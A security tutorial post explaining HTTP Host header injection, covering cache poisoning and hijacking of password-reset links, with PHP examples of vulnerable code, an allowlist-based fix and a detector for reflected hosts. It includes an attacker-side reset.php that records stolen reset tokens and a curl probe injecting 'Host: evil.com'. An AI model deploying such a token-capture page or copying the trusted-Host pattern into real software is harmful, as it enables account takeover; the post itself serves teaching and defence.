HTTP Host Header Injections

Host Header Injections

This post explains HTTP Host header poisoning and the consequences of exploiting it, such as cache poisoning and stealing password-reset tokens.

Hello again,
This time we are going to explain in detail an old, limited vulnerability: injecting the Host header.
Since you cannot force a browser to issue an HTTP request with an injected Host header, this vulnerability cannot be exploited directly against users. Internet Explorer is the only browser that can issue a request with an injected Host header, when it gets redirected; this was discovered by Sergey Bobrov, and Microsoft did not fix it quickly. The bug is fixed on Windows 10, but Windows 7 is still vulnerable.

The impact of injecting host header
– Cache poisoning
– Password-Reset links hijacking.

First, let's explain cache poisoning.
What is a cache? Let's assume you browse a newspaper or magazine site that lets you choose multiple options to customize your feed: your country, area, favourite topics and so on. The web application takes your input, searches the back end and displays the result to you. This process can take some time, so caching was invented to serve you the last result instead of repeating the whole process.
Now, what if you can alter this cached result? Another user may request the same resource, and the cache server responds with your malicious result. This can lead to further consequences such as defacement or phishing.

Second, hijacking password-reset links or codes.

When you forget your Facebook password and request a new one, Facebook will email you a link containing a 6-digit code, like the following:

[code language="php"]
https://facebook.com/reset?id=your_id&code=random
[/code]

That is what happens on the front end. What about the back end?

First Facebook generates a random code, then constructs a URL and sends it to you.

[code language="php"]
<?php
// Illustrative helper functions; they do not exist in any real framework.
$code  = Get_random_code(6);
$host  = Get_Host();
$id    = Get_user_id();
$email = Get_user_email();
$link  = "http://" . $host . "/reset?id=" . $id . "&code=" . $code;
mail($email, "Password reset", $link);
[/code]

Look at the code: some of these functions do not exist, they are only in my mind. The code itself is not the point; our main point here is how the web application gets the host before constructing the link. Let's talk about another website, since Facebook is not vulnerable to this issue. Let's suppose mysocial.com is vulnerable to Host header injection: it takes your Host header and prints it.

In PHP, some developers trust the user-supplied host; they think it cannot be edited, so:

[code language="php"]
$host = $_SERVER['HTTP_HOST'];
[/code]

This value is controlled by an attacker.
Now the web application thinks the user forgot his password and that it should send him a link to reset it. The code will be as follows:

[code language="php"]
<?php
$code  = bin2hex(random_bytes(10));   // random reset token (rand(9,20) would only yield 9..20)
$host  = $_SERVER['HTTP_HOST'];       // taken straight from the request: attacker-controlled
$email = Get_user_email();            // illustrative helper
$link  = "http://" . $host . "/account/reset.php?code=" . $code;
mail($email, "Password reset", $link);
[/code]

Did you notice

[code language="php"]$host = $_SERVER['HTTP_HOST'];[/code]

In PHP this value is set by the end user (SERVER_NAME is not). So what if an attacker sets this value to evil.com? The final link that will be sent to the real user becomes:

[code language="php"]
http://evil.com/account/reset.php?code=789a7fjafajf9af789sf
[/code]

This link will now be sent to the real user.
Then the attacker, who owns evil.com, will create a new directory on his website named account, and inside it a new file named reset.php containing the following code:

[code language="php"]
<?php
// Attacker's reset.php: record the token, then bounce the victim to a
// not-found page on the real site so the link merely looks broken.
$codevalue = $_GET['code'];
file_put_contents('stolen.txt', $codevalue);
header('Location: http://targetwebsite.com/notfoundpage');
[/code]

What is this? It is a real phishing attack performed with help from the web application itself. The real user will check his inbox, find the malicious link and click it; the code is sent to the attacker's website and stored there thanks to the reset.php file. The attacker now takes the real code or hash and resets the victim's password, while the victim assumes the link is simply broken and does not suspect phishing.
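The fix is to never let the request's Host header decide where the reset link points. The following is an added example, not code from the original post: it keeps a configured canonical host, checks the incoming Host against an allowlist (ignoring case and an explicit port), and builds the link from the configured value only. The constants, function names and the mysocial.com allowlist are assumptions for illustration.

```php
<?php
// Added example (not from the original post): a reset-link builder that
// refuses to trust the Host header. Constant and function names are assumed.
declare(strict_types=1);

// Hosts this application is legitimately served on (assumed config value).
const ALLOWED_HOSTS = ['mysocial.com', 'www.mysocial.com'];
// The canonical host used in every outbound link, never taken from the request.
const CANONICAL_HOST = 'mysocial.com';

/**
 * True only if the request Host matches one of our allowed hosts.
 * Comparison is case-insensitive and ignores an explicit ":port" suffix,
 * since clients may legitimately send "mysocial.com:443".
 */
function is_allowed_host(?string $requestHost): bool
{
    if ($requestHost === null || $requestHost === '') {
        return false;
    }
    $hostOnly = preg_replace('/:\d+$/', '', $requestHost);
    $hostOnly = strtolower(rtrim((string) $hostOnly, '.'));
    return in_array($hostOnly, ALLOWED_HOSTS, true);
}

/** Generate a 20-hex-character reset code from the CSPRNG. */
function generate_reset_code(): string
{
    return bin2hex(random_bytes(10));
}

/**
 * Build the reset link. If the request Host is not on the allowlist the
 * request is rejected outright; otherwise the link uses CANONICAL_HOST
 * over https, so an injected Host can never reach the email.
 */
function build_reset_link(?string $requestHost, string $code): string
{
    if (!is_allowed_host($requestHost)) {
        throw new RuntimeException('Unexpected Host header; refusing to build reset link');
    }
    if (!preg_match('/^[0-9a-f]{20}$/', $code)) {
        throw new InvalidArgumentException('Malformed reset code');
    }
    return 'https://' . CANONICAL_HOST . '/account/reset.php?code=' . rawurlencode($code);
}

// Demo: an injected Host is rejected, legitimate variants all yield a link on our domain.
$code = generate_reset_code();
foreach (['evil.com', 'mysocial.com:443', 'MySocial.com'] as $host) {
    try {
        echo $host, ' -> ', build_reset_link($host, $code), PHP_EOL;
    } catch (RuntimeException $e) {
        echo $host, ' -> rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

Rejecting the request, rather than silently substituting the canonical host, is deliberate: an unexpected Host value on a password-reset endpoint is worth logging as a probe, and the same allowlist check belongs in front of any other place the application echoes the host (redirects, canonical links, cookie domains).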

Now we have explained what Host header injection is.
How to detect it? It is like an ordinary XSS: you have to inject something and see whether it is reflected or not.
Using curl on your Unix machine, this command is enough to detect Host header injection:

[code language="bash"]
curl -H 'Host: evil.com' http://targetwebsite.com/ -i
[/code]

For Windows users, you can use Burp Repeater, but you need to write the request yourself, or use our tool Host Injector, which has some auto-generated payloads to bypass some filters.
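Reading the `curl -i` output by eye works for one request, but the reflection can hide in a Location header, a Set-Cookie domain or a link in the body. The following added example (not from the original post or the Host Injector tool) parses a raw HTTP response and lists every place the injected host value appears. The sample response embedded in it is constructed for the demo and was not captured from any real site.

```php
<?php
// Added example (not from the original post): parse a raw "curl -i" style
// HTTP response and report where an injected Host value was reflected.
declare(strict_types=1);

/**
 * Split a raw HTTP response into status line, a list of [name, value]
 * header pairs (names lower-cased, repeats preserved) and the body.
 */
function parse_http_response(string $raw): array
{
    $raw = str_replace("\r\n", "\n", $raw);
    [$head, $body] = array_pad(explode("\n\n", $raw, 2), 2, '');
    $lines  = explode("\n", $head);
    $status = array_shift($lines);
    $headers = [];
    foreach ($lines as $line) {
        if (strpos($line, ':') === false) {
            continue;
        }
        [$name, $value] = explode(':', $line, 2);
        $headers[] = [strtolower(trim($name)), trim($value)];
    }
    return ['status' => $status, 'headers' => $headers, 'body' => $body];
}

/**
 * Return one finding per place the injected host shows up: any response
 * header carrying it, and every absolute URL in the body built from it.
 */
function find_host_reflection(string $raw, string $injectedHost): array
{
    $resp = parse_http_response($raw);
    $findings = [];
    foreach ($resp['headers'] as [$name, $value]) {
        if (stripos($value, $injectedHost) !== false) {
            $findings[] = "header '$name' reflects $injectedHost: $value";
        }
    }
    // Absolute URLs in the body such as href="http://evil.com/...".
    $pattern = '~https?://' . preg_quote($injectedHost, '~') . '[^\s"\'<>]*~i';
    if (preg_match_all($pattern, $resp['body'], $m)) {
        foreach (array_unique($m[0]) as $url) {
            $findings[] = "body contains URL built from injected host: $url";
        }
    }
    return $findings;
}

// Constructed sample, as "curl -H 'Host: evil.com' http://targetwebsite.com/ -i"
// might print for a site that trusts HTTP_HOST. Not captured from a real site.
$sample = "HTTP/1.1 302 Found\r\n"
    . "Date: Mon, 01 Jan 2018 00:00:00 GMT\r\n"
    . "Location: http://evil.com/account/reset.php\r\n"
    . "Set-Cookie: session=abc; Domain=evil.com; Path=/\r\n"
    . "Content-Type: text/html\r\n"
    . "\r\n"
    . "<html><body><a href=\"http://evil.com/account/reset.php\">Reset</a>"
    . " <a href=\"https://targetwebsite.com/help\">Help</a></body></html>\r\n";

$findings = find_host_reflection($sample, 'evil.com');
if ($findings === []) {
    echo "No reflection of injected Host found.", PHP_EOL;
} else {
    echo "Injected Host reflected in ", count($findings), " place(s):", PHP_EOL;
    foreach ($findings as $f) {
        echo '  - ', $f, PHP_EOL;
    }
}
```

On the constructed sample this reports three hits (the Location header, the cookie Domain and the body link); the Help link on targetwebsite.com is correctly ignored. If a response like this is also served from a shared cache, the reflected value is exactly what the cache-poisoning scenario above would hand to the next visitor, so a hit on a cacheable response is the higher-priority finding.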

[Image: Host header injector tool]
[Image: Host header injection]

SEE YOU
